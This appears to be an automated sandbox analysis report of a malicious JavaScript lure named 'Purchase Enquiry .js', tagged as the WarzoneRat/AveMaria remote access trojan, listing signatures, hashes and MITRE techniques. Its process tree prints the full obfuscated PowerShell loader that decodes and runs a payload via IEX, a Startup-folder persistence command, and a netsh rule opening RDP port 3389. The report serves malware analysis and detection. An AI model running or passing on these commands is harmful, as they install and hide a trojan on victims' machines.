Analysis

  • max time kernel
    167s
  • max time network
    191s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30-11-2022 04:11

General

  • Target

    Purchase Enquiry .js

  • Size

    1KB

  • MD5

    840422981206fe204ad674b563497eee

  • SHA1

    fbadcc5fa1e489d965591d769da3bf7039fc5b7f

  • SHA256

    76522e1121f296222f3a9c9913638e5e6e9ab4be9206fc86ed32c1827b44b689

  • SHA512

    8cc95a62d66b7afcb8f402b4603773a3d3b877cdbf0c07492f75cc3b5bfc6e5cb91aa0997509b0e939a187ad8037d766ba23a4c3758da94a31940a4fc348d9ee

Malware Config

Signatures

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Warzone RAT payload 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 28 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Purchase Enquiry .js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,511
55551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151
115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51151555,51115551,51151115,51115111,51151555,51155551,55151115,51111555,51111551,51111515,55151111,51115511,51155551,55151111,51115511,51155551,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2472
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
          PID:1560
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          3⤵
            PID:2380
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            3⤵
            • Sets DLL path for service in the registry
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2312
            • C:\Users\Admin\AppData\Local\Temp\9.exe
              "C:\Users\Admin\AppData\Local\Temp\9.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2068
              • C:\Windows\SysWOW64\netsh.exe
                netsh advfirewall firewall add rule name="3389" dir=in action=allow protocol=TCP localport=3389
                5⤵
                • Modifies Windows Firewall
                PID:3820
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 396
                5⤵
                • Program crash
                PID:1012
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\Purchase Enquiry .js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: RenamesItself
          • Suspicious use of AdjustPrivilegeToken
          PID:3136
      • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
        "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
        1⤵
          PID:1980
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
          1⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3272
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3272 CREDAT:17410 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1180
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k NetworkService -s TermService
          1⤵
            PID:4556
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2068 -ip 2068
            1⤵
              PID:4032

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    T1031 Modify Existing Service (1)
    T1060 Registry Run Keys / Startup Folder (1)
  • Defense Evasion
    T1112 Modify Registry (2)
  • Discovery
    T1012 Query Registry (1)
    T1082 System Information Discovery (2)

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: 6cf293cb4d80be23433eecf74ddb5503
    SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
    SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
    SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 454f9e7fa8aad19d6bac74d19b3086b2
    SHA1: fd31e6cf15a019921faf239343ace0da3cfb06c2
    SHA256: 0f3226ebe6776806997c74f28e76ad5eb235909b8645d43d3564d823fc7834f2
    SHA512: 763af517762363994c0da1bbeef555ce4d8e7928b8dc9ece3aa90a24a232490f990c1948687957c55df2b010cc95c08267e4c5df48645739c70416c60a54840e

  • C:\Users\Admin\AppData\Local\Temp\11d5600c-2bda-4d22-b1dc-d8a970181a72\AgileDotNetRT64.dll
    Filesize: 75KB
    MD5: 42b2c266e49a3acd346b91e3b0e638c0
    SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
    SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
    SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

  • C:\Users\Admin\AppData\Local\Temp\784b3b15-2b8e-42df-b11e-ec70bb6ec5f0\AgileDotNetRT64.dll
    Filesize: 75KB
    MD5: 42b2c266e49a3acd346b91e3b0e638c0
    SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
    SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
    SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

  • C:\Users\Admin\AppData\Local\Temp\9.exe
    Filesize: 70KB
    MD5: ca96229390a0e6a53e8f2125f2c01114
    SHA1: a54b1081cf58724f8cb292b4d165dfee2fb1c9f6
    SHA256: 0df3d05900e7b530f6c2a281d43c47839f2cf2a5d386553c8dc46e463a635a2c
    SHA512: e93445bce6c8b6f51890309577a0ea9369860d2e6bf8cc0ca708879a77bb176d27c5f559bbdb7deb4b719aee0fc48d9068c293559f7629baf4ec3515898102ef

  • memory/2068-151-0x0000000000000000-mapping.dmp
  • memory/2068-155-0x0000000000200000-0x000000000022D000-memory.dmp
    Filesize: 180KB
  • memory/2312-150-0x000000000B470000-0x000000000B610000-memory.dmp
    Filesize: 1.6MB
  • memory/2312-149-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize: 1.4MB
  • memory/2312-147-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize: 1.4MB
  • memory/2312-141-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize: 1.4MB
  • memory/2312-142-0x000000000040B556-mapping.dmp
  • memory/2312-146-0x0000000000400000-0x0000000000568000-memory.dmp
    Filesize: 1.4MB
  • memory/2472-137-0x00007FF9D2C60000-0x00007FF9D3721000-memory.dmp
    Filesize: 10.8MB
  • memory/2472-148-0x00007FF9D2C60000-0x00007FF9D3721000-memory.dmp
    Filesize: 10.8MB
  • memory/2472-139-0x00007FF9CBA60000-0x00007FF9CBBAE000-memory.dmp
    Filesize: 1.3MB
  • memory/2472-132-0x0000000000000000-mapping.dmp
  • memory/2472-135-0x00007FF9D2C60000-0x00007FF9D3721000-memory.dmp
    Filesize: 10.8MB
  • memory/2472-133-0x0000019CCAC60000-0x0000019CCAC82000-memory.dmp
    Filesize: 136KB
  • memory/3136-136-0x00007FF9D2C60000-0x00007FF9D3721000-memory.dmp
    Filesize: 10.8MB
  • memory/3136-134-0x0000000000000000-mapping.dmp
  • memory/3820-154-0x0000000000000000-mapping.dmp